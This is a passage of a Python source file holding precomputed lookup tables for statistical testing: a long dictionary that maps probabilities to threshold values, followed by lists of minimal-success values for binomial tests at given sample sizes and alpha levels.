0.06938268318247667, 0.303: 0.06964948863540682, 0.304: 0.06991660049723834, 0.305: 0.07018401956087042, 0.306: 0.07045174662238612, 0.307: 0.0707197824810849, 0.308: 0.07098812793950916, 0.309: 0.07125678380343634, 0.31: 0.07152575088192321, 0.311: 0.0717950299872978, 0.312: 0.07206462193520236, 0.313: 0.07233452754459807, 0.314: 0.07260474763778418, 0.315: 0.07287528304041406, 0.316: 0.07314613458153059, 0.317: 0.07341730309355458, 0.318: 0.07368878941234251, 0.319: 0.0739605943771658, 0.32: 0.07423271883076066, 0.321: 0.07450516361932857, 0.322: 0.07477792959256262, 0.323: 0.07505101760367115, 0.324: 0.07532442850939472, 0.325: 0.07559816317001775, 0.326: 0.07587222244939851, 0.327: 0.07614660721498685, 0.328: 0.07642131833784976, 0.329: 0.07669635669267517, 0.33: 0.07697172315780416, 0.331: 0.07724741861525855, 0.332: 0.07752344395075124, 0.333: 0.07779980005369812, 0.334: 0.07807648781727695, 0.335: 0.07835350813839569, 0.336: 0.07863086191775942, 0.337: 0.07890855005986012, 0.338: 0.07918657347301983, 0.339: 0.07946493306940684, 0.34: 0.07974362976505, 0.341: 0.08002266447986961, 0.342: 0.08030203813769611, 0.343: 0.08058175166629386, 0.344: 0.0808618059973792, 0.345: 0.08114220206666058, 0.346: 0.08142294081384127, 0.347: 0.08170402318263831, 0.348: 0.08198545012083736, 0.349: 0.08226722258028256, 0.35: 0.08254934151692636, 0.351: 0.08283180789082699, 0.352: 0.08311462266620714, 0.353: 0.08339778681143724, 0.354: 0.08368130129909428, 0.355: 0.08396516710597787, 0.356: 0.08424938521310864, 0.357: 0.08453395660580112, 0.358: 0.08481888227364158, 0.359: 0.08510416321055453, 0.36: 0.08538980041478683, 0.361: 0.08567579488898139, 0.362: 0.08596214764016047, 0.363: 0.08624885967976403, 0.364: 0.0865359320236927, 0.365: 0.08682336569231888, 0.366: 0.08711116171051607, 0.367: 0.08739932110768468, 0.368: 0.08768784491778941, 0.369: 0.08797673417936844, 0.37: 0.0882659899355753, 0.371: 0.08855561323420916, 0.372: 0.0888456051277254, 0.373: 0.08913596667328731, 0.374: 
0.08942669893276224, 0.375: 0.089717802972796, 0.376: 0.09000927986480035, 0.377: 0.09030113068499687, 0.378: 0.09059335651445141, 0.379: 0.09088595843909883, 0.38: 0.09117893754977441, 0.381: 0.09147229494223763, 0.382: 0.09176603171722476, 0.383: 0.09206014898043888, 0.384: 0.09235464784261732, 0.385: 0.09264952941954734, 0.386: 0.09294479483209815, 0.387: 0.09324044520626536, 0.388: 0.09353648167316578, 0.389: 0.09383290536911687, 0.39: 0.09412971743564406, 0.391: 0.0944269190195053, 0.392: 0.09472451127274187, 0.393: 0.09502249535270467, 0.394: 0.09532087242208949, 0.395: 0.09561964364895584, 0.396: 0.09591881020677938, 0.397: 0.09621837327448969, 0.398: 0.09651833403647817, 0.399: 0.09681869368265199, 0.4: 0.09711945340848228, 0.401: 0.09742061441499439, 0.402: 0.09772217790885732, 0.403: 0.09802414510238132, 0.404: 0.0983265172135625, 0.405: 0.09862929546613368, 0.406: 0.09893248108958946, 0.407: 0.09923607531921358, 0.408: 0.09954007939613327, 0.409: 0.09984449456734855, 0.41: 0.10014932208577966, 0.411: 0.1004545632102829, 0.412: 0.10076021920570839, 0.413: 0.10106629134293674, 0.414: 0.10137278089891696, 0.415: 0.10167968915669329, 0.416: 0.10198701740546645, 0.417: 0.10229476694061598, 0.418: 0.10260293906374693, 0.419: 0.10291153508273282, 0.42: 0.10322055631175478, 0.421: 0.10353000407133751, 0.422: 0.1038398796884129, 0.423: 0.10415018449632063, 0.424: 0.1044609198348933, 0.425: 0.10477208705047297, 0.426: 0.10508368749596653, 0.427: 0.10539572253088365, 0.428: 0.10570819352137661, 0.429: 0.10602110184029956, 0.43: 0.1063344488672443, 0.431: 0.10664823598856697, 0.432: 0.10696246459746714, 0.433: 0.10727713609401288, 0.434: 0.10759225188519075, 0.435: 0.10790781338494819, 0.436: 0.10822382201425752, 0.437: 0.10854027920113521, 0.438: 0.10885718638071207, 0.439: 0.10917454499527934, 0.44: 0.10949235649431968, 0.441: 0.10981062233457517, 0.442: 0.11012934398009516, 0.443: 0.11044852290226946, 0.444: 0.11076816057990178, 0.445: 0.11108825849923756, 0.446: 
0.11140881815402805, 0.447: 0.11172984104559078, 0.448: 0.11205132868283442, 0.449: 0.11237328258233543, 0.45: 0.11269570426838246, 0.451: 0.11301859527303189, 0.452: 0.11334195713615819, 0.453: 0.11366579140549511, 0.454: 0.11399009963672858, 0.455: 0.1143148833935199, 0.456: 0.11464014424756157, 0.457: 0.11496588377864335, 0.458: 0.11529210357471631, 0.459: 0.11561880523193852, 0.46: 0.11594599035472929, 0.461: 0.1162736605558398, 0.462: 0.11660181745639499, 0.463: 0.11693046268597888, 0.464: 0.11725959788265967, 0.465: 0.11758922469309523, 0.466: 0.11791934477254173, 0.467: 0.1182499597849514, 0.468: 0.11858107140302623, 0.469: 0.11891268130827812, 0.47: 0.11924479119108941, 0.471: 0.11957740275078407, 0.472: 0.119910517695687, 0.473: 0.1202441377431809, 0.474: 0.12057826461978641, 0.475: 0.12091290006121841, 0.476: 0.12124804581247554, 0.477: 0.12158370362784898, 0.478: 0.12191987527107043, 0.479: 0.12225656251530974, 0.48: 0.12259376714328658, 0.481: 0.12293149094732167, 0.482: 0.12326973572942887, 0.483: 0.12360850330134049, 0.484: 0.12394779548463959, 0.485: 0.12428761411078311, 0.486: 0.124627961021199, 0.487: 0.12496883806734783, 0.488: 0.12531024711081143, 0.489: 0.1256521900233532, 0.49: 0.12599466868701625, 0.491: 0.1263376849941603, 0.492: 0.12668124084758633, 0.493: 0.12702533816057304, 0.494: 0.12736997885698464, 0.495: 0.1277151648713401, 0.496: 0.12806089814888133, 0.497: 0.1284071806456874, 0.498: 0.12875401432871114, 0.499: 0.12910140117589755, 0.5: 0.1294493431762619, 0.501: 0.12979784232994518, 0.502: 0.1301469006483328, 0.503: 0.13049652015414506, 0.504: 0.13084670288147476, 0.505: 0.13119745087593734, 0.506: 0.13154876619470057, 0.507: 0.13190065090662206, 0.508: 0.13225310709230625, 0.509: 0.13260613684422873, 0.51: 0.13295974226678015, 0.511: 0.1333139254764025, 0.512: 0.1336686886016622, 0.513: 0.13402403378335564, 0.514: 0.13437996317458453, 0.515: 0.13473647894087462, 0.516: 0.13509358326026316, 0.517: 0.13545127832339895, 0.518: 
0.13580956633363708, 0.519: 0.13616844950714427, 0.52: 0.136527930072998, 0.521: 0.13688801027328987, 0.522: 0.13724869236323353, 0.523: 0.13760997861126137, 0.524: 0.1379718712991265, 0.525: 0.13833437272202093, 0.526: 0.1386974851886771, 0.527: 0.1390612110214796, 0.528: 0.13942555255657146, 0.529: 0.13979051214395583, 0.53: 0.14015609214763355, 0.531: 0.14052229494569438, 0.532: 0.14088912293043793, 0.533: 0.14125657850848247, 0.534: 0.1416246641008996, 0.535: 0.14199338214330975, 0.536: 0.1423627350860244, 0.537: 0.14273272539413945, 0.538: 0.14310335554768486, 0.539: 0.14347462804172595, 0.54: 0.1438465453864995, 0.541: 0.1442191101075287, 0.542: 0.14459232474577235, 0.543: 0.1449661918577153, 0.544: 0.14534071401553914, 0.545: 0.1457158938072179, 0.546: 0.14609173383668234, 0.547: 0.14646823672391804, 0.548: 0.14684540510512592, 0.549: 0.14722324163286887, 0.55: 0.14760174897616385, 0.551: 0.14798092982066696, 0.552: 0.14836078686879586, 0.553: 0.1487413228398762, 0.554: 0.14912254047027446, 0.555: 0.14950444251355421, 0.556: 0.14988703174062287, 0.557: 0.15027031093987303, 0.558: 0.15065428291734878, 0.559: 0.15103895049687566, 0.56: 0.15142431652022192, 0.561: 0.15181038384726742, 0.562: 0.1521971553561463, 0.563: 0.15258463394339888, 0.564: 0.15297282252415018, 0.565: 0.1533617240322658, 0.566: 0.15375134142050884, 0.567: 0.15414167766070536, 0.568: 0.15453273574392945, 0.569: 0.1549245186806466, 0.57: 0.15531702950090986, 0.571: 0.1557102712545081, 0.572: 0.1561042470111676, 0.573: 0.15649895986070417, 0.574: 0.15689441291321915, 0.575: 0.15729060929927896, 0.576: 0.1576875521700936, 0.577: 0.1580852446976913, 0.578: 0.1584836900751271, 0.579: 0.15888289151666476, 0.58: 0.15928285225796399, 0.581: 0.1596835755562652, 0.582: 0.16008506469061237, 0.583: 0.16048732296202217, 0.584: 0.16089035369370905, 0.585: 0.16129416023126705, 0.586: 0.16169874594289305, 0.587: 0.16210411421957827, 0.588: 0.16251026847533698, 0.589: 0.16291721214739183, 0.59: 
0.16332494869642622, 0.591: 0.16373348160675336, 0.592: 0.1641428143865904, 0.593: 0.1645529505682422, 0.594: 0.16496389370832842, 0.595: 0.16537564738804714, 0.596: 0.16578821521334683, 0.597: 0.16620160081521945, 0.598: 0.16661580784990357, 0.599: 0.16703083999912705, 0.6: 0.1674467009703354, 0.601: 0.16786339449698484, 0.602: 0.16828092433873468, 0.603: 0.16869929428172162, 0.604: 0.169118508138823, 0.605: 0.1695385697498988, 0.606: 0.16995948298204558, 0.607: 0.17038125172989044, 0.608: 0.17080387991581378, 0.609: 0.17122737149026232, 0.61: 0.17165173043198836, 0.611: 0.1720769607483454, 0.612: 0.17250306647555386, 0.613: 0.1729300516790017, 0.614: 0.17335792045351325, 0.615: 0.1737866769236534, 0.616: 0.17421632524401046, 0.617: 0.1746468695994971, 0.618: 0.17507831420565434, 0.619: 0.17551066330896237, 0.62: 0.17594392118712604, 0.621: 0.17637809214942018, 0.622: 0.1768131805369832, 0.623: 0.17724919072313622, 0.624: 0.17768612711373116, 0.625: 0.17812399414744517, 0.626: 0.1785627962961532, 0.627: 0.17900253806524002, 0.628: 0.17944322399393162, 0.629: 0.17988485865567744, 0.63: 0.180327446658469, 0.631: 0.18077099264520646, 0.632: 0.1812155012940707, 0.633: 0.18166097731887176, 0.634: 0.1821074254694106, 0.635: 0.18255485053187898, 0.636: 0.18300325732921507, 0.637: 0.18345265072150788, 0.638: 0.18390303560636884, 0.639: 0.18435441691933233, 0.64: 0.18480679963426472, 0.641: 0.18526018876376166, 0.642: 0.1857145893595442, 0.643: 0.18617000651289878, 0.644: 0.18662644535509104, 0.645: 0.1870839110577722, 0.646: 0.18754240883345613, 0.647: 0.18800194393592007, 0.648: 0.18846252166064992, 0.649: 0.18892414734532698, 0.65: 0.18938682637023913, 0.651: 0.18985056415878246, 0.652: 0.19031536617790407, 0.653: 0.19078123793859408, 0.654: 0.19124818499635504, 0.655: 0.19171621295171193, 0.656: 0.19218532745069095, 0.657: 0.1926555341853225, 0.658: 0.19312683889416116, 0.659: 0.19359924736280187, 0.66: 0.19407276542439827, 0.661: 0.19454739896019313, 0.662: 
0.1950231539000885, 0.663: 0.1955000362231294, 0.664: 0.19597805195812434, 0.665: 0.19645720718417137, 0.666: 0.1969375080312527, 0.667: 0.19741896068079068, 0.668: 0.1979015713662402, 0.669: 0.19838534637370456, 0.67: 0.1988702920425144, 0.671: 0.19935641476587196, 0.672: 0.19984372099143724, 0.673: 0.20033221722198943, 0.674: 0.20082191001605193, 0.675: 0.20131280598855258, 0.676: 0.20180491181148238, 0.677: 0.20229823421455562, 0.678: 0.202792779985896, 0.679: 0.20328855597273982, 0.68: 0.20378556908210874, 0.681: 0.20428382628155384, 0.682: 0.20478333459984766, 0.683: 0.20528410112773196, 0.684: 0.20578613301867388, 0.685: 0.2062894374895787, 0.686: 0.20679402182159856, 0.687: 0.20729989336089943, 0.688: 0.20780705951945155, 0.689: 0.20831552777581072, 0.69: 0.20882530567596289, 0.691: 0.2093364008341447, 0.692: 0.20984882093367282, 0.693: 0.21036257372779668, 0.694: 0.2108776670405803, 0.695: 0.21139410876777068, 0.696: 0.2119119068777031, 0.697: 0.21243106941219608, 0.698: 0.21295160448747266, 0.699: 0.21347352029512576, 0.7: 0.21399682510303225, 0.701: 0.21452152725634926, 0.702: 0.21504763517848402, 0.703: 0.21557515737209668, 0.704: 0.21610410242011052, 0.705: 0.2166344789867689, 0.706: 0.2171662958186337, 0.707: 0.21769956174571664, 0.708: 0.21823428568248668, 0.709: 0.21877047662904875, 0.71: 0.2193081436722041, 0.711: 0.2198472959866113, 0.712: 0.2203879428359658, 0.713: 0.22093009357411275, 0.714: 0.22147375764632216, 0.715: 0.22201894459043073, 0.716: 0.22256566403813283, 0.717: 0.22311392571621594, 0.718: 0.22366373944783802, 0.719: 0.22421511515382514, 0.72: 0.2247680628540138, 0.721: 0.22532259266856458, 0.722: 0.22587871481936841, 0.723: 0.22643643963140753, 0.724: 0.22699577753418013, 0.725: 0.2275567390631562, 0.726: 0.22811933486122538, 0.727: 0.2286835756801963, 0.728: 0.2292494723823189, 0.729: 0.22981703594182484, 0.73: 0.23038627744649448, 0.731: 0.23095720809927242, 0.732: 0.23152983921988868, 0.733: 0.2321041822464993, 0.734: 
0.23268024873742021, 0.735: 0.23325805037279204, 0.736: 0.23383759895636017, 0.737: 0.23441890641727506, 0.738: 0.23500198481185625, 0.739: 0.23558684632547633, 0.74: 0.23617350327442724, 0.741: 0.23676196810786698, 0.742: 0.23735225340971805, 0.743: 0.23794437190069778, 0.744: 0.23853833644033903, 0.745: 0.2391341600290356, 0.746: 0.23973185581016365, 0.747: 0.2403314370722066, 0.748: 0.24093291725095917, 0.749: 0.2415363099317333, 0.75: 0.24214162885164442, 0.751: 0.24274888790188998, 0.752: 0.24335810113014295, 0.753: 0.2439692827429402, 0.754: 0.244582447108108, 0.755: 0.24519760875728072, 0.756: 0.24581478238846102, 0.757: 0.24643398286857535, 0.758: 0.24705522523614448, 0.759: 0.247678524703978, 0.76: 0.2483038966619244, 0.761: 0.2489313566797009, 0.762: 0.24956092050970227, 0.763: 0.2501926040899815, 0.764: 0.25082642354721935, 0.765: 0.251462395199727, 0.766: 0.25210053556061046, 0.767: 0.25274086134088347, 0.768: 0.2533833894527322, 0.769: 0.25402813701282223, 0.77: 0.25467512134563586, 0.771: 0.25532435998694697, 0.772: 0.255975870687307, 0.773: 0.25662967141564796, 0.774: 0.25728578036293126, 0.775: 0.257944215945903, 0.776: 0.25860499681089555, 0.777: 0.25926814183775904, 0.778: 0.2599336701437952, 0.779: 0.2606016010878805, 0.78: 0.26127195427462435, 0.781: 0.26194474955857344, 0.782: 0.2626200070486076, 0.783: 0.26329774711236986, 0.784: 0.26397799038077596, 0.785: 0.2646607577527068, 0.786: 0.2653460703996925, 0.787: 0.26603394977082295, 0.788: 0.26672441759766086, 0.789: 0.26741749589934827, 0.79: 0.26811320698777924, 0.791: 0.2688115734729059, 0.792: 0.2695126182681659, 0.793: 0.27021636459605924, 0.794: 0.270922835993805, 0.795: 0.2716320563191784, 0.796: 0.2723440497564509, 0.797: 0.2730588408225018, 0.798: 0.27377645437302944, 0.799: 0.27449691560896095, 0.8: 0.27522025008299583, 0.801: 0.27594648370626207, 0.802: 0.2766756427552376, 0.803: 0.27740775387872363, 0.804: 0.2781428441050571, 0.805: 0.2788809408495003, 0.806: 0.27962207192177896, 
0.807: 0.2803662655338274, 0.808: 0.2811135503077288, 0.809: 0.2818639552838439, 0.81: 0.2826175099291502, 0.811: 0.28337424414582163, 0.812: 0.28413418827992953, 0.813: 0.28489737313051333, 0.814: 0.2856638299587509, 0.815: 0.28643359049743594, 0.816: 0.2872066869607032, 0.817: 0.28798315205396063, 0.818: 0.2887630189841298, 0.819: 0.28954632147014897, 0.82: 0.2903330937537252, 0.821: 0.2911233706104174, 0.822: 0.2919171873609755, 0.823: 0.2927145798830292, 0.824: 0.2935155846230349, 0.825: 0.2943202386086293, 0.826: 0.2951285794612334, 0.827: 0.2959406454090917, 0.828: 0.296756475300599, 0.829: 0.29757610861805905, 0.83: 0.29839958549179174, 0.831: 0.29922694671465455, 0.832: 0.30005823375696744, 0.833: 0.3008934887818879, 0.834: 0.3017327546612134, 0.835: 0.30257607499161887, 0.836: 0.30342349411142644, 0.837: 0.304275057117819, 0.838: 0.3051308098845464, 0.839: 0.30599079908023513, 0.84: 0.3068550721871839, 0.841: 0.3077236775206872, 0.842: 0.3085966642490721, 0.843: 0.3094740824141966, 0.844: 0.3103559829527036, 0.845: 0.3112424177178285, 0.846: 0.3121334395019754, 0.847: 0.3130291020598767, 0.848: 0.31392946013267803, 0.849: 0.3148345694725149, 0.85: 0.31574448686815393, 0.851: 0.31665927017126166, 0.852: 0.3175789783235609, 0.853: 0.31850367138497404, 0.854: 0.31943341056253666, 0.855: 0.32036825824038817, 0.856: 0.3213082780106422, 0.857: 0.3222535347054343, 0.858: 0.32320409442988757, 0.859: 0.3241600245963502, 0.86: 0.32512139395965584, 0.861: 0.3260882726537293, 0.862: 0.3270607322293416, 0.863: 0.3280388456932857, 0.864: 0.32902268754886954, 0.865: 0.33001233383784195, 0.866: 0.33100786218383216, 0.867: 0.3320093518373427, 0.868: 0.33301688372237925, 0.869: 0.3340305404847731, 0.87: 0.3350504065422603, 0.871: 0.33607656813651987, 0.872: 0.33710911338693283, 0.873: 0.3381481323466401, 0.874: 0.33919371706047996, 0.875: 0.3402459616253203, 0.876: 0.3413049622526002, 0.877: 0.34237081733338237, 0.878: 0.34344362750587093, 0.879: 0.344523495725656, 0.88: 
0.3456105273387513, 0.881: 0.34670483015749626, 0.882: 0.3478065145396591, 0.883: 0.3489156934706179, 0.884: 0.3500324826490219, 0.885: 0.3511570005760081, 0.886: 0.35228936864811067, 0.887: 0.35342971125409106, 0.888: 0.35457815587599106, 0.889: 0.35573483319437665, 0.89: 0.35689987719830346, 0.891: 0.3580734253000495, 0.892: 0.3592556184548126, 0.893: 0.36044660128589723, 0.894: 0.3616465222155064, 0.895: 0.36285553360138006, 0.896: 0.3640737918798012, 0.897: 0.3653014577152351, 0.898: 0.3665386961568701, 0.899: 0.36778567680270435, 0.9: 0.3690425739712867, 0.901: 0.37030956688192357, 0.902: 0.3715868398434812, 0.903: 0.37287458245257316, 0.904: 0.3741729898016013, 0.905: 0.37548226269719714, 0.906: 0.3768026078897954, 0.907: 0.378134238314937, 0.908: 0.37947737334708087, 0.909: 0.38083223906674324, 0.91: 0.38219906854181984, 0.911: 0.3835781021239361, 0.912: 0.38496958776079576, 0.913: 0.38637378132577954, 0.914: 0.3877909469657132, 0.915: 0.38922135746822073, 0.916: 0.39066529464976885, 0.917: 0.3921230497662107, 0.918: 0.3935949239469887, 0.919: 0.3950812286550077, 0.92: 0.39658228617383234, 0.921: 0.3980984301243421, 0.922: 0.39963000601279863, 0.923: 0.4011773718129906, 0.924: 0.4027408985847371, 0.925: 0.4043209711317251, 0.926: 0.40591798870156176, 0.927: 0.4075323657317996, 0.928: 0.4091645326448546, 0.929: 0.41081493669652935, 0.93: 0.41248404288216023, 0.931: 0.41417233490523914, 0.932: 0.41588031621383637, 0.933: 0.41760851111052566, 0.934: 0.4193574659425829, 0.935: 0.4211277503789231, 0.936: 0.42291995878221855, 0.937: 0.42473471168447596, 0.938: 0.42657265737574357, 0.939: 0.4284344736166483, 0.94: 0.43032086948677106, 0.941: 0.432232587381485, 0.942: 0.43417040517298744, 0.943: 0.4361351385507812, 0.944: 0.4381276435612516, 0.945: 0.44014881936622124, 0.946: 0.44219961124405294, 0.947: 0.44428101385974056, 0.948: 0.4463940748332428, 0.949: 0.44853989864010696, 0.95: 0.4507196508818678, 0.951: 0.4529345629700977, 0.952: 0.45518593727289863, 0.953: 
0.45747515278081924, 0.954: 0.45980367135633604, 0.955: 0.46217304464121944, 0.956: 0.4645849217079045, 0.957: 0.4670410575530351, 0.958: 0.46954332254848785, 0.959: 0.4720937129834131, 0.96: 0.47469436285272015, 0.961: 0.47734755707524595, 0.962: 0.4800557463561398, 0.963: 0.4828215639469468, 0.964: 0.4856478446055499, 0.965: 0.4885376461125343, 0.966: 0.4914942737745481, 0.967: 0.49452130842950337, 0.968: 0.4976226385777961, 0.969: 0.5008024973958326, 0.97: 0.5040655055604257, 0.971: 0.5074167210204681, 0.972: 0.5108616971284513, 0.973: 0.5144065508883955, 0.974: 0.5180580435286398, 0.975: 0.5218236761943078, 0.976: 0.5257118043278883, 0.977: 0.5297317753353202, 0.978: 0.5338940955221816, 0.979: 0.5382106341669483, 0.98: 0.5426948752053159, 0.981: 0.5473622306342155, 0.982: 0.5522304349152825, 0.983: 0.5573200471216728, 0.984: 0.5626550985532288, 0.985: 0.5682639400343021, 0.986: 0.574180368432149, 0.987: 0.5804451518443972, 0.988: 0.5871081376193765, 0.989: 0.5942312358276155, 0.99: 0.6018927595381185, 0.991: 0.6101939464147714, 0.992: 0.6192691432165274, 0.993: 0.6293024734013033, 0.994: 0.6405567501490285, 0.995: 0.653427511088023, 0.996: 0.6685545316863031, 0.997: 0.687086469892058, 0.998: 0.7114599543785525, 0.999: 0.7488112942693539} # skipcq: FLK-E231, FLK-E501 } if self.used_multinomial_test == 'Approx': # Stores the number of minimal successes for the BT with the stated sample-sizes and probabilities self.bt_min_succ_data = { 'num_bt = 1000, alpha = 0.1': [0.00010537719726562501, 0.00053192138671875, 0.0011025695800781247, 0.001745849609375, 0.002434478759765625, 0.0031548461914062496, 0.0038988952636718746, 0.004661621093749999, 0.0054394836425781246, 0.00622998046875, 0.007031219482421876, 0.007841796875000001, 0.008660491943359376, 0.009486450195312503, 0.010318756103515628, 0.011156921386718754, 0.01200039672851563, 0.012848632812500007, 0.013701263427734384, 0.014557983398437509, 0.015418487548828134, 0.01628247070312501, 0.017149749755859388, 
0.018020080566406263, 0.01889334106445314, 0.019769226074218764, 0.02064773559570314, 0.021528625488281265, 0.022411773681640636, 0.02329711914062501, 0.024184600830078132, 0.025073974609375008, 0.025965240478515637, 0.026858337402343765, 0.027753143310546888, 0.028649597167968763, 0.029547637939453135, 0.030447204589843763, 0.031348175048828135, 0.03225061035156251, 0.03315444946289064, 0.03405950927734376, 0.03496591186523438, 0.035873535156250004, 0.03678231811523438, 0.037692199707031256, 0.03860324096679688, 0.03951538085937501, 0.04042855834960939, 0.041342712402343766, 0.04225790405273439, 0.043174011230468774, 0.04409109497070315, 0.04500903320312503, 0.04592788696289065, 0.046847595214843774, 0.04776815795898439, 0.04868951416015627, 0.0496116638183594, 0.050534606933593774, 0.05145828247070316, 0.05238275146484379, 0.05330795288085941, 0.054233825683593785, 0.05516036987304691, 0.05608764648437504, 0.05701559448242192, 0.0579441528320313, 0.058873382568359424, 0.05980322265625005, 0.060733673095703176, 0.0616647338867188, 0.06259634399414066, 0.06352856445312505, 0.06446139526367192, 0.06539471435546879, 0.06632864379882816, 0.06726306152343753, 0.06819802856445314, 0.06913348388671878, 0.07006948852539066, 0.07100598144531253, 0.07194296264648442, 0.07288037109375006, 0.07381832885742196, 0.07475677490234384, 0.07569564819335947, 0.07663494873046883, 0.07757473754882821, 0.07851495361328134, 0.0794555969238282, 0.08039666748046884, 0.0813381652832032, 0.08228002929687508, 0.08322238159179696, 0.08416510009765632, 0.08510824584960947, 0.0860517578125001, 0.08699563598632823, 0.08793994140625011, 0.08888455200195325, 0.08982958984375011, 0.0907749938964845, 0.09172076416015637, 0.0926668395996095, 0.09361334228515636, 0.09456015014648447, 0.0955073242187501, 0.09645480346679697, 0.09740264892578135, 0.09835079956054699, 0.09929931640625012, 0.10024807739257824, 0.10119726562500012, 0.10214669799804699, 0.10309643554687511, 0.10404653930664076, 
0.10499694824218764, 0.10594760131835951, 0.10689855957031263, 0.10784988403320328, 0.10880145263671892, 0.10975332641601579, 0.11070544433593765, 0.11165786743164077, 0.11261059570312515, 0.11356356811523452, 0.11451684570312515, 0.11547036743164077, 0.11642419433593765, 0.11737826538085952, 0.11833258056640639, 0.11928720092773451, 0.12024206542968766, 0.1211971740722658, 0.12215252685546893, 0.12310818481445332, 0.12406402587890647, 0.12502017211914085, 0.12597650146484402, 0.12693313598632844, 0.1278899536132816, 0.128847076416016, 0.12980438232421915, 0.13076193237304728, 0.13171972656250042, 0.13267776489257854, 0.13363598632812546, 0.13459445190429736, 0.13555316162109426, 0.13651211547851616, 0.1374712524414068, 0.1384306335449224, 0.13939019775390682, 0.14035000610351622, 0.14130999755859436, 0.1422702331542975, 0.14323065185546935, 0.1441913146972662, 0.14515216064453185, 0.14611318969726622, 0.14707446289062565, 0.1480359191894538, 0.14899761962890695, 0.14995944213867257, 0.15092150878906319, 0.1518837585449226, 0.15284625244140698, 0.15380886840820385, 0.1547717285156257, 0.1557347717285163, 0.15669799804687568, 0.15766140747070378, 0.15862500000000063, 0.15958877563476626, 0.16055273437500062, 0.16151693725586003, 0.1624812622070319, 0.16344577026367252, 0.16441046142578192, 0.16537533569336005, 0.1663403930664069, 0.1673056335449225, 0.1682710571289069, 0.16923660278320374, 0.17020239257812564, 0.17116830444336, 0.17213439941406317, 0.17310067749023506, 0.17406707763671947, 0.17503372192382888, 0.17600048828125076, 0.17696737670898516, 0.17793450927734455, 0.17890176391601642, 0.17986920166015702, 0.18083676147461014, 0.18180456542968826, 0.18277243041992264, 0.18374053955078207, 0.18470877075195397, 0.1856771240234384, 0.18664566040039154, 0.18761437988281343, 0.18858322143554784, 0.189552246093751, 0.1905213928222666, 0.191490722656251, 0.19246017456054787, 0.19342980957031353, 0.19439956665039165, 0.19536950683593857, 0.196339569091798, 
0.1973097534179699, 0.19828012084961055, 0.19925061035156372, 0.2002212829589856, 0.20119207763672003, 0.20216299438476693, 0.20313409423828255, 0.2041053161621107, 0.20507672119140757, 0.20604818725586072, 0.2070198364257826, 0.2079916687011732, 0.20896356201172006, 0.20993563842773566, 0.21090783691406378, 0.21188021850586064, 0.21285266113281376, 0.21382528686523566, 0.21479803466797004, 0.21577090454101694, 0.21674395751953257, 0.21771707153320446, 0.2186903686523451, 0.21966378784179824, 0.22063732910156386, 0.221610992431642, 0.22258483886718888, 0.22355874633789202, 0.2245328369140639, 0.2255070495605483, 0.22648138427734515, 0.22745584106445454, 0.2284304199218764, 0.2294051208496108, 0.23037994384765764, 0.23135494995117323, 0.23233001708984508, 0.23330520629882945, 0.23428057861328255, 0.23525601196289192, 0.23623162841797002, 0.23720730590820438, 0.23818316650390753, 0.23915908813476694, 0.24013519287109508, 0.2411113586425795, 0.24208764648437636, 0.24306411743164197, 0.24404064941406384, 0.24501730346679823, 0.24599414062500136, 0.24697103881836074, 0.2479480590820326, 0.24892520141601698, 0.24990246582031383, 0.25087985229492316, 0.251857360839845, 0.2528349304199231, 0.25381268310547, 0.25479049682617305, 0.2557684936523449, 0.256746551513673, 0.2577247314453136, 0.25870303344726675, 0.2596814575195324, 0.26065994262695436, 0.26163861083984497, 0.26261734008789184, 0.26359619140625123, 0.26457516479492316, 0.2655542602539076, 0.2665334167480483, 0.2675127563476577, 0.26849215698242335, 0.2694716796875015, 0.2704513244628922, 0.2714310302734392, 0.2724109191894548, 0.2733908691406267, 0.27437094116211114, 0.2753510742187518, 0.2763313293457049, 0.2773117675781268, 0.2782922058105487, 0.2792728271484394, 0.2802535095214863, 0.28123431396484566, 0.28221524047851754, 0.28319628906250194, 0.2841773986816426, 0.2851586303710957, 0.286139923095705, 0.28712139892578314, 0.28810293579101753, 0.28908459472656445, 0.2900663146972675, 0.2910481567382831, 
0.2920301208496112, 0.2930121459960956, 0.2939942932128925, 0.2949765625000019, 0.2959589538574239, 0.296941406250002, 0.29792391967773635, 0.2989066162109395, 0.2998893737792989, 0.3008721923828146, 0.30185519409179906, 0.3028382568359398, 0.3038213806152368, 0.3048046264648462, 0.3057879943847681, 0.30677148437500257, 0.3077550354003933, 0.30873864746094026, 0.3097224426269559, 0.3107062377929716, 0.311690216064456, 0.3126742553710967, 0.3136583557128937, 0.31464263916015933, 0.315626922607425, 0.3166113891601594, 0.3175959167480501, 0.31858050537109706, 0.3195652160644564, 0.3205500488281283, 0.3215349426269565, 0.32251995849609716, 0.3235050354003941, 0.32449023437500346, 0.3254754943847691, 0.3264608764648472, 0.3274463806152379, 0.32843194580078483, 0.3294175720214879, 0.3304033813476598, 0.33138919067383166, 0.33237512207031605, 0.333361175537113, 0.33434729003906616, 0.33533352661133187, 0.33631982421875384, 0.3373062438964882, 0.33829272460937887, 0.33927932739258204, 0.3402659912109415, 0.34125277709961344, 0.34223962402344166, 0.3432265930175824, 0.3442136230468794, 0.34520077514648884, 0.3461879882812545, 0.34717532348633273, 0.3481627197265672, 0.34915017700195794, 0.35013781738281735, 0.35112545776367676, 0.3521132202148487, 0.35310110473633316, 0.3540890502929739, 0.35507705688477087, 0.35606518554688027, 0.3570534362793022, 0.3580417480468804, 0.35903012084961483, 0.3600186157226618, 0.36100717163086493, 0.3619957885742243, 0.3629845886230525, 0.36397338867188067, 0.36496231079102137, 0.3659513549804745, 0.3669403991699276, 0.3679296264648495, 0.3689188537597714, 0.3699082641601621, 0.3708976745605528, 0.3718872070312559, 0.3728768615722715, 0.3738665771484434, 0.37485635375977155, 0.37584625244141223, 0.37683621215820917, 0.37782623291016226, 0.3788163757324279, 0.379806640625006, 0.38079690551758416, 0.3817873535156311, 0.382777801513678, 0.38376837158203736, 0.3847590637207092, 0.3857497558593811, 0.38674063110352175, 0.3877315063476624, 
